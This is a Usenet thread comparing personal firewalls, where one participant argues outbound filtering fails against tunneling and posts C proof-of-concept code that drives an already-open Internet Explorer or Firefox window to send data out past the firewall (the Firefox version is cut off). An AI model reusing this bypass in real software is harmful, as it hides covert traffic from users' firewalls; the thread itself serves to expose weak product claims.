Zone Alarm vs Kerio

Which is better and why?

Reply to
Wattsville Blues

It obviously depends on what your needs are and what you want...

Reply to
Kerodo

Obviously. I'm not a really advanced user so can you be more specific about what I should detail about my needs?

Reply to
Wattsville Blues

Just use the Windows-Firewall.

Yours, VB.

Reply to
Volker Birk

I'm afraid that won't do, I need a firewall to control outbound connections.

Reply to
Wattsville Blues

Unfortunately, it's not possible to control outbound traffic reliably, because of tunneling.

A simple test proves this:

formatting link
start an Internet Explorer, and test it for your own, your "Personal Firewall" activated.

In our tests every of the tested "Personal Firewalls" failed to detect even such simple tunneling methods. Alexander Bernauer then wrote a simple remote shell with this POC, the wwwsh. And no "Personal Firewall" was able to detain this remote control software, as expected (you can download the code here:

formatting link
Even, if the "Personal Firewall" providers will extend their efforts, and will try to prevent this in future releases, there are so many possibilities to tunnel, that this attempt cannot not succeed.

So it's true unfortunately, that the only type of application the "Personal Firewalls" are able to stop communicating, are the programs, which admit to be controlled.

Yes, some more harmless malware is like this, but I doubt, that this is what you intend to stop communicating.

The only way to avoid unwanted software on your PC is not installing and executing it. If it's running, mostly it's too late.

Yours, VB.

Reply to
Volker Birk

Does this apply to other browsers also, or is it just IE..

Reply to
Kerodo

formatting link
This works with any browser.

Yours, VB.

Reply to
Volker Birk

What's supposed to happen when I go to this URL ???

Reply to
Anonymous

You'll see C source code for a POC, how to communicate outside in spite of any "Personal Firewall". This POC requires, that the browser is already running.

If you believe, that this is a problem, I will post a POC, how to start the browser without having problems with a "Personal Firewall", too.

First the Internet Explorer version:

--------------------------- snip ------------------------------------------
#include <windows.h>

int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    /* look for an already running Internet Explorer window */
    HWND ie = FindWindowEx(NULL, NULL, "IEFrame", NULL);
    HWND wrk, tb, cbx, cb, url;

    if (ie == NULL) {
        MessageBox(NULL, "Please open an Internet Explorer window, or "
                   "I will goin' to open one myself ;-)", "Oooh!",
                   MB_OK | MB_ICONEXCLAMATION);

        return 0;
    }

    /* walk down the window hierarchy to the edit control of the address bar */
    wrk = FindWindowEx(ie, NULL, "WorkerW", NULL);
    tb = FindWindowEx(wrk, NULL, "ReBarWindow32", NULL);
    cbx = FindWindowEx(tb, NULL, "ComboBoxEx32", NULL);
    cb = FindWindowEx(cbx, NULL, "ComboBox", NULL);
    url = FindWindowEx(cb, NULL, "Edit", NULL);

    /* put the URL into the address bar and press Return */
    SendMessage(url, WM_SETTEXT, NULL, "formatting link");
    PostMessage(url, WM_SETFOCUS, 0, 0);
    PostMessage(url, WM_KEYDOWN, VK_RETURN, 0);
    return 0;
}

--------------------------- snap ------------------------------------------

and here the Mozilla Firefox version:

--------------------------- snip ------------------------------------------
#include <windows.h>

const char *phoneHome = "formatting link";

int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    /* look for an already running Mozilla Firefox window */
    HWND browser = FindWindowEx(NULL, NULL, "MozillaWindowClass", NULL);
    HWND wnd = FindWindowEx(browser, NULL, "MozillaWindowClass", NULL);
    int i;

    SetForegroundWindow(wnd);

    PostMessage(wnd, WM_CHAR, (WPARAM) 9, 0);

    for (i=0; i

Reply to
Volker Birk

Ok, thanks, that's what I wanted to know.

Reply to
Kerodo

Why do you want to do this? The IP stack of Windows has no bugs with ICMP echo any more, so it's useless to stop it.

Yours, VB.

Reply to
Volker Birk

BTW: you could also cancel your article. Just read the documentation of your newsreader.

F'up2P, VB.

Reply to
Volker Birk

Easy tiger, I'm just a novice and you lost me there! I just like to be stealthed.

Oh, and I cancelled those other messages - I'd no idea that could be done, so cheers!

Reply to
Wattsville Blues

This is impossible.

The "stealth"-features of the "Personal Firewalls" all are based on misunderstanding ICMP.

It is not possible to make a PC "invisible" in the Internet by a Software running on this PC if it's connected, because a host seems to be not there only, if a router before the host sends ICMP Destination Unreachable with code 0 (net unreachable) or code 1 (host unreachable), see RFC 791 / STD 0005,

formatting link
Therefore i.e. portscanners have no problem to detect a PC, which is "stealthed" by any "Personal Firewall".

For example, with nmap use the parameter -P0 to detect PCs, which are "stealthed".

I don't know, if the providers of the "Personal Firewalls" don't understand the Internet Protocol family, or if they're lying to sell their products with non-existing "stealth"-features.

Yours, VB.

Reply to
Volker Birk
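Added example (not part of the original thread): a small Python classifier for the point made in the post above, that silence is not the same signal as a router's ICMP Destination Unreachable with code 0 or 1. The addresses, the constructed packets and the function names are assumptions made for illustration.

```python
import socket
import struct

ABSENT_CODES = {0: "net unreachable", 1: "host unreachable"}  # codes named in the post

def checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum over an ICMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_unreachable(code: int, quoted: bytes) -> bytes:
    """Construct a sample ICMP Destination Unreachable (type 3) message."""
    unsummed = struct.pack("!BBHI", 3, code, 0, 0) + quoted
    return struct.pack("!BBHI", 3, code, checksum(unsummed), 0) + quoted

def classify(target: str, reply_src, icmp_msg) -> str:
    """Return what one probe result shows an observer about `target`."""
    if icmp_msg is None:
        return "filtered"   # silence: packets were dropped, nothing says "absent"
    if len(icmp_msg) < 8 or checksum(icmp_msg) != 0:
        raise ValueError("malformed ICMP message")
    icmp_type, code = icmp_msg[0], icmp_msg[1]
    if reply_src == target:
        return "present"    # any answer from the address itself shows it is up
    if icmp_type == 3 and code in ABSENT_CODES:
        return "absent"     # an upstream router reports net/host unreachable
    return "filtered"       # other router errors (e.g. code 13) reveal a filter

# Constructed sample data: documentation addresses, quoted IPv4 header + 8 TCP bytes.
TARGET, ROUTER = "192.0.2.10", "192.0.2.1"
QUOTED = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                     socket.inet_aton("198.51.100.7"), socket.inet_aton(TARGET))
QUOTED += struct.pack("!HHI", 40000, 80, 0)

if __name__ == "__main__":
    cases = [("no reply at all", None, None),
             ("router, code 1", ROUTER, build_unreachable(1, QUOTED)),
             ("target, code 3", TARGET, build_unreachable(3, QUOTED)),
             ("router, code 13", ROUTER, build_unreachable(13, QUOTED))]
    for label, src, msg in cases:
        print(f"{label:16} -> {classify(TARGET, src, msg)}")
```

Only the second case looks like an absent host, and it is produced by a router in front of the PC, not by software on the PC itself.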

Jeus, forget I said anything.

Reply to
Wattsville Blues

Sorry, I didn't want to scare you away ;-)

I just wanted to explain, why the advertisement of the "Personal Firewall" providers is rank nonsense. What they're claiming, their products should accomplish, just is impossible.

There is a gap between reality and advertisement here - and not only here, I'm sorry.

Yours, VB.

Reply to
Volker Birk

You're not one of those people who thinks using AV software is a bad idea are you?

Reply to
Wattsville Blues

No, I'm not. Anti-Virus tools can be utilized sensibly, if one knows the constraints they're subjecting.

Why?

Yours, VB.

Reply to
Volker Birk

Firewalls are one thing, but people who think that AVs are worthless are idiots.

Reply to
Wattsville Blues
